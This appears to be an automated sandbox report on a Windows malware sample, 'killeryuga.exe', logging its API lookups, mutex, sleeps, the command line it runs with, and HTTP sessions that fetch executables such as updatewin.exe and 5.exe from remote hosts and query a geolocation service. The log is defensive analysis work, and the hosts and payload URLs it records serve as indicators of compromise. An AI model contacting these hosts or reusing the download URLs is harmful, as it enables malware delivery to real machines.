Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74b59263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a8436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathA, address_out = 0x760e7804 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 47
Fn
Service (2)
Operation Additional Information Success Count
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
User (1)
Operation Additional Information Success Count
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Window (1)
Operation Window Name Additional Information Success Count
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
System (665)
Operation Additional Information Success Count
Sleep duration = 1 milliseconds (0.001 seconds) True 407
Sleep duration = 100000 milliseconds (100.000 seconds) True 1
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Get Time type = System Time, time = 2019-03-24 16:36:30 (UTC) True 1
Get Time type = Ticks, time = 112882 True 1
Get Time type = Performance Ctr, time = 17412281778 True 1
Get Time type = System Time, time = 2019-03-24 16:36:32 (UTC) True 1
Get Time type = Performance Ctr, time = 17649686175 True 1
Get Time type = System Time, time = 2019-03-24 16:36:33 (UTC) True 1
Get Info type = Hardware Information True 249
Get Info type = Operating System True 1
Mutex (1)
Operation Additional Information Success Count
Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Environment (2)
Operation Additional Information Success Count
Get Environment String - True 2
Data
Network Behavior
HTTP Sessions (8)
»
Information Value
Total Data Sent 4.08 KB
Total Data Received 5.75 MB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 95.213.139.118
HTTP Session #1
»
Information Value
User Agent Microsoft Internet Explorer
Server Name loot.ug
Server Port 80
Username -
Password -
Data Sent 169 bytes
Data Received 285 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Fn
Read Response size = 1024, size_out = 103 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin1.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin1.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 2560 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin2.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin2.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 4608 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #4
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin.exe True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin.exe True 1
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Read Response size = 10240, size_out = 10240 True 27
Read Response size = 10240, size_out = 7680 True 1
Close Session - True 1
HTTP Session #5
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/3.exe True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/3.exe True 1
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
HTTP Session #6
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/4.exe True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/4.exe True 1
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
HTTP Session #7
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/5.exe True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/5.exe True 1
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Read Response size = 10240, size_out = 10240 True 15
Read Response size = 10240, size_out = 3072 True 1
Close Session - True 1
HTTP Session #8
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.32 KB
Operation Additional Information Success Count
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Read Response size = 10240, size_out = 554 True 1
Close Session - True 1
Process #6: killeryuga.exe
Information Value
ID #6
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0x9d0
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x9D4
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
Host Behavior
File (3)
Operation Filename Additional Information Success Count
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Module (184)
Operation Module Additional Information Success Count
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Load GDI32.dll base_address = 0x75ad0000 True 1
Load ole32.dll base_address = 0x755e0000 True 1
Load SHELL32.dll base_address = 0x75fd0000 True 1
Load USER32.dll base_address = 0x74f40000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 13
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x76c33c5a True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x76c5a959 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x76cb7198 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x76cb75fe True 1
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x76cbd232 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x76c5d594 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x76c3418b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x76c31462 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x76c335b7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
